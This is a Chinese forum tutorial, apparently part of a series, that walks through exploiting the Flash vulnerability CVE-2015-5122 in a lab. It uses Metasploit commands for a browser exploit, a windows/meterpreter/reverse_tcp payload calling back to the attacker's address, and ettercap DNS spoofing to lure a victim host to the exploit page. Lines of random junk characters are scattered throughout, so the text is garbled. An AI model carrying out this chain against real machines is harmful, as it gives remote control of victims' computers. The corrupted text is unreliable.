. k' [. E/ W6 ~8 o8 j5 O6 j+ Z
二、cve2015-5122漏洞实例演示虚拟机
/ z" O. C1 e; ~" }- T1 K 8 n: I1 r- O6 q% D/ I
! v) n Q% v" u# J. `5 o+ D; G 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
0 L# h2 }6 {, A, z- I
5 K5 C3 V/ J& M. Z7 t, e; M0 Q# Z; `1 Y
search cve-2015-5122如图: / s: S5 P! h% X& K v3 \
% ~3 i( R9 y R |! V4 z
0 ?% x9 h( [# @2 ^
- {8 p& Y' W3 @% ~0 x
- b% J3 C' U8 ]- ]* i+ J( p( y% W
% m1 ]- J( e& \% y! {, s& X3 |3 y
下面我们敲如下命令:
% g1 ~9 _, q, q) S* q8 F- u 2 I" x, G ?. E3 Z1 Z
0 X2 @7 g4 x' \. V+ f, S$ d
use exploit/multi/browser/adobe_flash_opaque_background_uaf 7 y! q7 l) O6 v5 T& x
6 o6 f7 S; M* e) P" U2 I
' f6 P: Q2 o* Z* D6 f set PAYLOAD windows/meterpreter/reverse_tcp % M' M% |" K1 j
* V, ]; c4 A1 b/ J8 B
E/ \# g+ Y! b! C set LHOST 192.168.0.109 b6 q( p& g, a4 o) @1 M
9 ^$ F9 |8 K9 L8 ]( M
9 l& J2 Y; e1 S( [) N
set URIPATH / /*根目录*/ 6 z: H( I% @* I5 F4 y( m; o" `7 C
0 l& B! B6 X+ c8 B* \7 n, g w
! C: ]4 N* y9 H$ U" d
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
1 m2 B" s9 m! p) j / e' a0 Y9 ]) {5 j) L o' [* i
* U, C# @* K6 [! ^8 I: t/ |9 n' Z) L% e
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ! P# t: J3 ^1 k4 a. B' {! r4 I/ a
" G7 C; g8 \! X& o
4 E6 t* z8 ?5 j% o" O9 w0 x 然后show options如图: 4 ]4 [6 }7 g" t! e- H: L
* d/ E' y4 G- x; o$ r% _9 B
4 s+ t8 ~, g5 e) Q ; p7 w. T6 z) m) N8 X5 Z
& d5 Q Y$ U1 B5 M0 n
' b) b6 C% V# s8 t 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: 9 Q9 T3 h8 s/ N! S
; ^8 ]1 _ V* @; w( c; o" J! T
n0 c& N: {8 E$ e, k' q# x3 y
! ^/ }- k8 ^) Y 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
/ E M6 R8 Y1 Y. F- F" y) R" w
7 x; x8 o' t) i; C
N: a0 k( _- R; ?/ x Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf * ?; q0 p4 `6 I$ i T3 a
$ y/ d9 |5 c/ I8 K' X" w ^& }
) J7 w( I! y/ d8 C6 W0 v4 f9 k
: L9 I3 h w8 r, J: w( _
0 q N5 N9 {$ a( ?8 H
0 d( ]) j! ], H+ { b 成功了,这时候我们断开ettercap,如图:
: L" b" O0 V% | \8 \0 f
6 A) u* U" v4 g
3 R8 T5 s# I2 U U3 p$ v
: t* S R& a4 e$ K9 a
% {4 h6 U6 U& N
' j n% \* F3 R" ~( i! s Screenshot如图:
+ R4 s& f: f- T# n1 C3 _ 2 v8 k8 h+ U& q; C
3 O2 Y( t3 |: Q
. ~5 ?. y3 T2 n# u8 L/ d4 n 6 s& r) h: I; ?& ~( n1 }
0 q1 O' U }- @. S, ]3 `) f" x 1 }7 H0 v. P% V+ S/ I
|